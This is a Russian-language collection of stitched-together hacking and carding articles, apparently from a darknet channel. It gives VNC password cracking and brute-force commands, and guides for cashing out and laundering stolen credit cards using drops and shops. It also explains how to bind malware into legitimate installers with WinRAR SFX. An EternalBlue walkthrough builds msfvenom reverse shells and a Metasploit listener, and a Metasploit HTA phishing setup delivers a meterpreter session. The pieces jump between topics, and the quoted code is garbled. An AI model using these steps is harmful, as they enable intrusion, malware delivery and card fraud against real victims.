Java Viewer и HTTP VNC используют порт 5800.
Просмотрщик (клиент) VNC в режиме прослушивания (Listening mode) прослушивает порт 5500.
Для сканирования сети в поисках VNC серверов и клиентов в режиме прослушивания:
sudo nmap -p 5500,5800,5900-5906 --open СЕТЬ

Например:
sudo nmap -p 5500,5800,5900-5906 --open 192.168.43.0/24

Анализ VNC трафика
Сессии VNC могут быть записаны, например, во время атак человек-посередине.

Для извлечения challenge и response VNC сессии можно использовать Ettercap:
ettercap -Tq -r ФАЙЛ.pcapng

С помощью фильтров Wireshark можно провести детальный анализ VNC сессии:
Чтобы показать только трафик VNC сессий:
vnc

VNC challenge (вызов):
vnc.auth_challenge

VNC response (ответ):
vnc.auth_response

Результат попытки аутентификации на VNC сервере:
vnc.auth_result

Вызов, ответ и результат попытки аутентификации на VNC сервере:
vnc.authchallenge or vnc.authresponse or vnc.auth_result

Имя компьютера с VNC сервером:
vnc.desktop_name

Позиция кнопок мыши:
vnc.button_1_pos
vnc.button_2_pos
…………...
vnc.button_8_pos
Выбранный тип безопасности:
vnc.client_security_type

Тип кодирования:
vnc.client_set_encodings_encoding_type

Версия VNC протокола клиента:
Версия VNC протокола сервера:
vnc.server_proto_ver

Ширина Framebuffer:
vnc.width
Клавиша:
vnc.key

Нажатие клавиши:
vnc.key_down
Данные передаваемого видео в формате H.264:
vnc.h264_data

Вырезанный текст:
vnc.client_cut_text

Взлом VNC пароля
Можно использовать разные приёмы для взлома VNC пароля:
Взлом пароля VNC сессии
Расшифровка сохранённого пароля VNC сервера
Брут-форс пароля сервера VNC
Взлом пароля VNC сессии
Из захваченной VNC сессии нужно извлечь Authentication challenge и Authentication response.
Если вы не хотите разбираться с методом, описанным для Hashcat, то используйте программу VNCrack.
Установка VNCrack
Установка в Kali Linux

wget http://www.phenoelit.org/vncrack/vncrack_s.gz
gunzip vncracks.gz
chmod +x vncracks
./vncrack_s
Установка в BlackArch
sudo pacman -S vncrack
Установка в Widnows
Скачайте файл http://www.phenoelit.org/vncrack/x4.exe и запустите его в командной строке.
Для взлома с VNCrack достаточно указать вызов, ответ и файл словаря, например, взлом пароля из перехваченной VNC сессии содержащий вызов (-c 894443629f4a9675809cff5da2e84651) и ответ (-r 271d94eb610b5c42588dc53506419e6a), пароли для брут-форса берутся из словаря (-w passwords.txt):
vncrack -c 894443629f4a9675809cff5da2e84651 -r 271d94eb610b5c42588dc53506419e6a -w passwords.txt

Брут-форс серверов VNC
Рассмотрим программы для брут-форса пароля серверов VNC.
Сервера VNC отклоняют подключения после нескольких неудачных попыток, поэтому брут-форс VNC нужно выполнять в один поток с большим интервалом между запросами.
patator это одна из самых универсальных и гибких в настройке программа для брут-форса.
В следующем примере время ожидания между запросами установлено на 61 секунду:
patator vnc_login host=192.168.43.250 password=FILE0 0=passwords.txt -t 1 -x quit:code=0 -x ignore:fgrep='authentication rejected' -x ignore:fgrep='Authentication failure' --rate-limit=61
Примеры ошибок, когда сервер отверг ваше подключение без проверки пароля:
Session setup failed: "Your connection has been rejected.
password check failed!
Как можно увидеть на следующих скриншотах, несмотря на долгое время брут-форса и парочку сообщений об ошибках, пароли на двух серверах VNC всё таки были подобраны:

Crowbar
 (ранее известный как Levye) — это инструмент для брут-форса, который может использоваться во время тестов на проникновение. Он создан для поддержки протоколов, которые в настоящее время не поддерживаются в THC-Hydra и другими популярными инструментами брут-форса.
Установка Crowbar
sudo apt install crowbar freerdp2-x11 openvpn nmap
Установка в BlackArch
sudo pacman -S crowbar freerdp openvpn nmap

Пример брут-форса службы RDP на единичном хосте (-s 192.168.86.61/32) со словарём паролей (-C /root/words.txt) используя 1 поток (-n 1):
crowbar -b vnckey -s 192.168.86.61/32 -C /root/words.txt -n 1

VNCrack
Об установке программы VNCrack сказано чуть выше.
Пример запуска брут-форса:
vncrack -h 192.168.43.250 -w passwords.txt

Расшифровка хранимых VNC паролей
Сервер VNC хранит пароль на компьютере в закодированном виде. Имеется множество способов извлечь этот пароль. Рассмотрим программы и способы расшифровки сохранённого пароля VNC сервера.
VNCPassView
VNCPassView — это небольшая утилита для восстановления паролей, сохранённых инструментами VNC.

Где Windows хранить VNC пароли
Пароли VNC в Windows хранятся в реестре в следующих ветках (список может быть неполным):
\HKEYLOCALMACHINE\SOFTWARE\TigerVNC\WinVNC4
\HKEY_LLOCALCHINE\SOFTWARE\TightVNC\Server
\HKEY_LOCLOCALINE\SOFTWARE\ORL\WinVNC3\Default
\HKEY_LOCALLOCALE\SOFTWARE\RealVNC\WinVNC4\
\HKEY_CURRENTCURRENTtware\TightVNC
\HKEYCURRENTUCURRENTare\TurboVNC
\HKEYCURRENTUSECURRENTe\ORL\WinVNC3\Password
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password
Пароль хранится в бинарном виде, его длина 8 байт.

Для чтения пароля из реестра можно воспользоваться командами для сохранения фрагментов реестра в файлы .reg, например:

regedit.exe /E winvnc3.reg "HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\"
regedit.exe /E winvnc4.reg "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4\"
Расшифровка пароля в VNCrack
С помощью VNCrack можно извлечь закодированный пароль, для этого запустите программу в интерактивном режиме:

Затем введите байты пароль — два байта на строку, например так:
14
cc
ac
84
2f
6f
8d
0d

В результате будет выведена итоговая строка и закодированный пароль:

Entered HEX String: 14 cc ac 84 2f 6f 8d d
VNC Password: 222222
Где Linux хранить VNC пароли
В Linux пароли могут храниться где угодно, но файлом по умолчанию является ~/.vnc/passwd. Для его просмотра откройте его любым редактором, способным отображать шестнадцатеричные данные:

Расшифровка пароля в Linux
В Linux также можно воспользоваться помощью VNCrack:
vncrack -C ~/.vnc/passwd

Восстановление пароля VNC сервера, хранимого в файле ~/.vnc/passwd:

Либо можете воспользоваться способом, который описал Bill Chaison: https://github.com/billchaison/VNCDecrypt. Для этого достаточно запустить команду следующего вида:
echo -n БАЙТЫ_ПАРОЛЯ | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
Например:
echo -n F0E43164F6C2E373 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Скрипты nmap для аудита VNC
Страница с перечнем NSE (скрипты Nmap): https://nmap.org/nsedoc/. На ней присутствуют следующие скрипты:
realvnc-auth-bypass
Проверяет, уязвим ли VNC-сервер к обходу аутентификации RealVNC (CVE-2006-2369).
vnc-brute
Выполняет брут-форс пароля VNC серверов.
vnc-info
Запрашивает у сервера VNC версию протокола и поддерживаемые типы безопасности.
Пытается войти на сервер VNC и получить имя его рабочего стола. Использует учетные данные, обнаруженные типами аутентификации vnc-brute или None. Если realvnc-auth-bypass был запущен и возвращен VULNERABLE, этот сценарий будет использовать эту уязвимость для обхода аутентификации.
Для запуска нужно использовать опцию --script, после которой можно указать скрипт, либо несколько скриптов через запятую:
sudo nmap -p 5500,5800,5900-5906 --script realvnc-auth-bypass,vnc-brute,vnc-info,vnc-title ХОСТ_ИЛИ_СЕТЬ

Также можно задействовать все скрипты следующим образом:
sudo nmap -p 5500,5800,5900-5906 --script 'vnc-*' ХОСТИЛИСЕТЬ

Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги.
Но в итоге всё сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $??

Способ № 0 - продажа
Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даёшь кредитную карточку - тебе тут же перечисляют практически легальные деньги.
Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты в последствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.
Способ №1 – перевод
Давай посмотрим, как осуществить перевод денег «СС > E-Gold > WM».
Дело в том, что E-Gold деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти), главное - выбрать подходящие тебе проценты. Конечно, здесь есть и сложности - у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.
Происходит всё так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на аккаунт в системе E-Gold. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно - открываешь свой e-gold-аккаунт и удивляешься лежащей там сумме. Но не всё так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спёр его честно заработанные деньги. Ребята из обменника отпишут в E-Gold – «помогите, нас ограбили». И твой E-Gold-аккаунт закроют вместе с деньгами. Так что очень важно успеть ещё эти деньги отмыть. Есть люди, которые этим занимаются – ты шлёшь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.
Ты можешь возразить: мол, можно найти обменник E-GOLD > WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег обнальщику. Но имей в виду, что вскоре этот обменник – после того, как E-Gold заберёт у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера - “Хочешь жить, умей вертеться”.
Способ № 2 – отмыв через аукцион
Идём на интернет-аукцион и выкладываем там лот: "Домен + хостинг за XX $ в год! Оплата по WM". Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг и продавать за XX $ покупателям с аукциона.
Казалось бы, всё просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да всё потому же - кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?
Способ №3 – партнерские программы
Для того, чтобы осуществить этот способ, нам придётся найти партнёрские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И - ждём свои WM.
Тут, думаю, всё шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнёрских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счётчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка.
Способ №4 – Задай себе вопрос за деньги
Наш путь лежит на сайты с платными ответами или заданиями. Для реализации этого способа надо взять кучу карт без кода, создать аккаунты и создавать себе задания из разных категорий. Каждый вопрос стоит определённую сумму (её ты требуешь сам). За 2-3 задания в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придётся попросить выслать чек, а при обнале - попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц. Сайты можно менять.
Способ №5 – Поторгуйся сам с собой
Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платёжную систему.
Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем всё у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберётся достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же - мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное - не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во всё те же WM.
Способ №6 – Задорно, но не порно?
Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин (к примеру, www.sextoyfun.com).
Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остаётся только прикинуться порно маньяком - вбить карты на своем шопе. Потом, уже в роли порно продавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).
У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус - обычно дают не больше 25% с продажи.

Заключение
Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет - это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется статьи.

Статья исключительно в ознакомительных целях и не призывает к действиям, нарушающим закон

t.me/lockdarknet

Информация в данной статье исключительно для новичков

Кардинг- высокоинтеллектуальный гоп-стоп.
Методика отъёма денег у пользователей раскрашенного пластика.
На просторах интернета широко шагает рука об руку с хакингом, скамингом и фишингом. Преследуется по закону.
Словарик кардера

• ATM (automatic teller machine) - банкомат. Жаргонное — бабломёт.
• сс, картон (credit card) - кредитная карта.
• Вбивальщик картона - человек, который занимается оформлением покупок по ворованным кредиткам в электронных магазинах. А это действительно не такое уж и простое дело. Чтобы не попалили, нужно сидеть под американской версией Винды, покупки совершать в определенное время, лазить через пиндосскую проксю (чем ближе от владельца карты, тем лучше) и т. п. важные мелочи.
• Трек (track) - данные магнитной полосы. Кроме номера карты содержит служебную информацию, без которой электронное использование карты (в терминалах) приводит к фейлу.
• ДП (dump + pin) - трек + ПИН.
• Дроп (drop) - подставное лицо, на которое приходит товар, заказанный в электронном магазине на ворованную кредитку. Чаще всего это нигры либо нищебродствующие иммигранты. Реже - наивные домохозяйки.
• Кардхолдер (card-holder) - настоящий держатель карты. Владелец карты всегда банк.
• Чарджбэк (money back) - процедура отзыва денег назад в том случае, если владелец карты заметил неладное.
• Рипер - кардер-кидала, который не гнушается дурить своих же коллег по преступному бизнесу.

Основные заблуждения.
1. Хочу все и сразу.
Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь всё есть.
2. Безопасность. Меня посадят.
Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнёт зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, при чём используешь не сокс, а именно дедик, который имеет наибольшую анонимность.
Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН,
ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.
3. Лёгкие деньги.
Возможно, ты уже знаешь, что все продавцы дампа+пина - это всё лохотрон.
А если нет, то предупреждаю, деньги за деньги никто не продаёт, чудеса возможны только в стране дураков.

Куда можно вбить и как на этом заработать.
1. Шопы.
Плюсы:относительно легко найти шлющий шоп.
Минусы: шопы быстро помирают, маленький % чистого дохода от вбива.
2. Свой мерчант счет.
Плюсы: доход от вбива до 95%.
Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом.
3. Брокерские конторы, типа форекс и биржи.
Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счёт на дропа с такими же именем и фамилией, как у холдера и слить все деньги на дропа.
4. Покер аккаунты и конторы со ставками на спорт.
Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. .
5. Мобильные операторы.
Скажу сразу, что в СНГ операторов вбить не получится, не спорю, такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.
6. Онлайн игры.
На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счёт игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пэйпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.
7. Платежные системы.
Не стоит вбивать в пэйпел, хотя бы потому, что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы(скрил), эта платёжка больше себя позиционирует для оплаты товаров и услуг, нежели для расчётов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.
8. Остальное.
Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д.
Вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.

Когда человек, далёкий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. всё упирается в лимиты.
Деньги с СС можно перевести на счёт казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрёт на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе всё накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.
Забегая вперёд, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдёргивают логи с банковскими аккуантами и сливают на своих дропов, а всё то, что продают- это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идёт транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.
Теперь спустимся на более реальную землю, заливы- это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десятков долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место- вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп- это по сути одна тема по сливу, если задрочить помрёт также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый-это отсев, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлёт ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берём не по верхней планке. 600$ - усреднённая стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.

Продолжение следует

Так вот при загрузке с лайв режима у нас запустится кали линукс со всеми возможностями, но есть одна проблемка,
после перезагрузки все данные не сохраняются, то есть если вы создадите папку то после перезагрузки ее не станет
ну а что бы этого не произошло нужно сделать некоторые действия.
НУ ЧТО? ПОЕХАЛИ!
первым делом мы скачиваем кали линукс с официального сайта https://www.kali.org/downloads/

Если у вас 64 битная система то скачиваем с 1 варианта. Если у вас 32 битная система то 2 вариант. Сделали? Тогда идем дальше. Дальше нужно скачать Rufus, для этого переходим по этой ссылке https://rufus.ie/ru_RU.html

После нужно вставить флешку в компьютер, а потом открыть руфус.
Руфус сам определит флешки

Теперь немного подождем.---------------------------------------------------------------------— ВСЕ! теперь надо перезагрузить компьютер и зайти в биос (что бы узнать как это сделать посмотрите в гугле, у всех разные кнопки)
после этого надо в биосе поставить загрузку с флешки (у всех тоже по разному но скрин покажу)

Теперь сохраняем настройки и выходим из биоса...
Браво!

Этой командой мы посмотрели диски вы должны увидеть диск /dev/sda

После чего, прописываем код:

gparted

У вас откроется окошко, после чего делаем это:

вас откроется окошко, после чего делаем это:

У вас откроется окошко, после чего делаем это:

После этого можно закрыть окно. Дальше прописываем снова "fdisk - l" и смотрим какое имя у persistence - обычно это sda или sdb.
Код:

mkdir -p /mnt/sda3 (sdb3)
mount /dev/sda3 /mnt/sda3 (sdb3)
echo "/ union" > /mnt/sda3/persistence.conf
umount /dev/sda3 (sdb3)

Надеюсь, я все понятно рассказал.

Начнём с того, что из себя представляет склейка.
Склейка - это совмещение нескольких файлов в один. При создании вирусов она часто используется.
Типичный пример: у нас есть два exe. Один из них - обычный установщик word, а второй - вирус, который незаметно поражает систему. И есть жертва, которой надо закинуть вирус. Отправлять сам вирус палевно. После того, как человек запустит файл и увидит, что происходит не то, что он ожидал, он насторожится. Для таких целей и существует склейка. Она помогает создать exe, который будет вести себя как обычная программа или даже установщик, а вирус будет запущен в фоне.
Сегодня мы познакомимся с одним из способов склейки вирусов с исполняемыми файлами.

Склейка через winrar
Этот метод является наиболее оптимальным среди простых методов склейки. На выходе мы получаем один исполняемый файл, который будет вести себя как исходная программа. Поскольку winrar - легитимная программа, она не добавляет новых детектов конечному файлу.

Подготовка
В системе должен быть установлен winrar. Для удобство лучше переместить файл вируса и файл, под который вирус будет маскироваться, в одну папку. В этом примере будет использоваться программа notmyfault, а в качестве вируса безобидная программа, которая просто покажет окно с текстом, что она запустилась.
Важно убедиться, что программа, с которой производится склейка, не должна иметь зависимостей. Например, нельзя просто выдернуть exe из установленной программы и отправить его кому-то. Скорее всего такая программа не заработает, потому что ей будет не хватать библиотек или файлов конфигурации.

Шаг 1
Выделяем файл вируса и конечной программы

Шаг 2
Нажимаем правой копкой мыши и выбираем Добавить в архив.

Шаг 3
Установите галочки "Create SFX archive", "Create solid archive" и "Lock archive"

Шаг 4
Во вкладке "Advanced" откройте "SFX options..."

Шаг 5
Во вкладке "Setup" на первой строке напишите имя программы, под которую маскируется вирус. Писать надо полное имя с расширением. С новой строки напишите имя файла вируса.

Порядок можно поменять. Тогда вирус запустится первым. Но это можно делать лишь с теми вирусами, которые переносят исполняемый файл после перезапуска. Иначе основная программа не запустится, пока вирус не завершит работу.
Шаг 6
Во вкладке "Modules" установите галочку "Unpack to temporary folder" и в "Silent mode" выбирите "Hide all"

Шаг 7
На вкладке "Update" в "Overwrite mode" поставьте "Overwrite all files"

Результат
В результате в папке с исходными файлами будет создан ещё один. Это и есть комбинированная программа, которая ведёт себя как исходный exe, но имеет в себе функции вируса.

Проверка
В результате запуска полученного файла в системе исполнится склеенный вирус, поэтому не надо запускать его на виртуалках не предназначенных для тестов.

После запуска exe открылась основная программа, после закрытия которой появилось это окно. Оно отобразилось потому что в качестве вируса было приложение, которое выводит, что система заражена. Настоящий вирус запускается в фоне без создания окон.

Тестируемый хост должен иметь включенную гостевую учетную запись(иначе получите ошибку) или известную пару логин:пароль!

Шелл-код уровня ядра берем здесь:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm

Проведем два вида атаки:
1. получим обратный шелл через TCP
2. получим сессию в meterpreter.
Готовим начинку:
Сохраняем .аsm файл и компилируем: nasm -f bin kernel_shell_x64.asm.

#msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

#msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[хост атакующего] LPORT=4444

Сольем шелл-код и полезную нагрузку в экстазе:
#cat kernel_shell_x64 shell_msf.bin>reverse_shell.bin
#cat kernel_shell_x64 meterpreter_msf.bin>meterpreter.bin

Готовим Metasploit к тесту:
> use exploit/multi/handler
> set PAYLOAD windows/x64/shell/reverse_tcp
> set LHOST IP_ATTACKER
> set LPORT 4444
> exploit
*Started reverse *****
*Started payload *****
(нехай ждет )

Качаем эксплоит от Sleepya. Берем здесь:
https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e.
Сохраняем как exploit.py

Готовим сплойт для тестирования с использованием на тачке с не отключенной гостевой учетной записью.
Ищем в сплойте строки 42 и 43 и заполняем:
PASSWORD=' '
(Если известны пара L:P применяем их)

Запускаем:
#python exploit.py <ipжертвы> reverseshell.bin 500

Версия эксплоит ETERNALBLUE на Python.
​После запуска сплойта, получаем сессию в Metasploit.
Аналогично поступаем для создания сессии с meterpreter.
Готовим Метасплоит:

> use exploit/multi/handler
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST IP
> set LPORT 4444
> exploit

Редактируем exploit.py (см. выше)
Стартуем эксплоит:
python exploit.py <ip_жертвы> meterpreter.bin 200

Версия эксплоит ETERNALBLUE на Python.
​Значение параметра numGroomConn установим в 200 для уменьшения количества соединений
(500 многовато, практически всегда атакуемая машина выпадает в Time-out, оптимально на мой взгляд ставить 300)
Получаем сессию.

Появился он недавно в версии Metasploit Framework v4.12.34

так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
> apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
> msfconsole
В появившейся консоли фреймворка пишем:

use exploit/windows/misc/htaserver
set payload /windows/meterpreter/reversetcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploit

Теперь если все проделано, верно, видим экран с таким содержимым:

Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто доставить, а убедить в том, что по ней необходимо перейти 
А третья, собственно, о том, что был поднят веб-сервер на локальном адресе.
Перейдем по ссылке на целевой машине:

Вернувшись к консоли линукс, мы видим, что сервер сообщает о доставке полезной нагрузки обратившемуся к нему адресу 172.16.0.139.

Вернемся к целевому хосту и скачаем то, что было предложено сервером.

Как видно, сервер сгенерировал нам некое приложение .hta - HTML Application (HTA) — приложение, написанное на HTML или Dynamic HTML.

После запуска получаем готовую рабочую сессию meterpreter.

Объясню, как это происходит, созданное приложение открыло в фоновом режиме другое приложение, которое может работать скрытно от глаз пользователя, зовется оно PowerShell - Представляет собой современную стандартизированную оболочку командной строки, обеспечивающую большую гибкость управления компьютером на базе операционной системы Windows. По сути, PowerShell — это та же командная строка, но только намного более функциональная. Увидеть ее можно, набрав в пуске - powershell

PowerShell содержащий полезную нагрузку обнаруживается в диспетчере задач:

Итак, по поводу нагрузки все ясно. Дальнейшие действия зависят от фантазии.
Я бы хотел обратить внимание на один очень важный, по моему мнению момент. Взглянем на исходный код скрипта, который находится /usr/share/metasploit-framework/modules/exploit/windows/misc/hta_server.rb написан он на Ruby:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(updateinfo(info,
'Name' => 'HTA Web Server',
'Description' => %q(
This module hosts an HTML Application (HTA) that when opened will run a
payload via Powershell. When a user navigates to the HTA file they will
be prompted by IE twice before the payload is executed.
),
'License' => MSFLICENSE,
'Author' => 'Spencer McIntyre',
'References' =>
[
['URL', 'https://www.trustedsec.com/july-2015/malicious-htas/']
],
# space is restricted by the powershell command limit
'Payload' => { 'DisableNops' => true, 'Space' => 2048 },
'Platform' => %w(win),
'Targets' =>
[
[ 'Powershell x86', { 'Platform' => 'win', 'Arch' => ARCHX86 } ],
[ 'Powershell x64', { 'Platform' => 'win', 'Arch' => ARCHX86_664 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 06 2016'
))
end
def onquest_uriuri(cli, _request)
printus('Delivering Payload')
p = regenerate_paylopayload(cli)
data = Msf::Util::EXE.toable_fmt(
fmt(
framework,
target.arch,
target.platform,
p.encoded,
'hta-psh',
{ :arch => target.arch, :platform => target.platform }
)
send(cli, data, 'Content-Type' => 'application/hta')
end
def random_uri
#uri
# uri needs to end in .hta for IE to process the file correctly
'/' + Rex::Text.randnumeric(rand(10) + 6) + '.hta'
end
end

Строка '/' + Rex::Text.rand_text_alphanumeric(rand(10) + 6) + '.hta' определяет название выходного файла. Данный метод генерирует абсолютную дичь, состоящую из 10 + -рандомных чисел и букв. (Fg8FGn34f9.hta) Предлагаю исправить это на более приемлемый вариант.
Делается это путем изменения метода .rand_text_alphanumeric на метод .uri_encode
В одинарных кавычках пишем, все что угодно. На этом все. Спасибо за внимание.

P.S. Осталось подумать, как приделать к нему более симпатичный ярлык…
P.P.S. Статья не является руководством к действию и опубликована исключительно в ознакомительных целях. За последствия вызванные применением данного метода на практике автор и ресурс, ответственности не несут.

2.Torch http://xmh57jrzrnw6insl.onion/
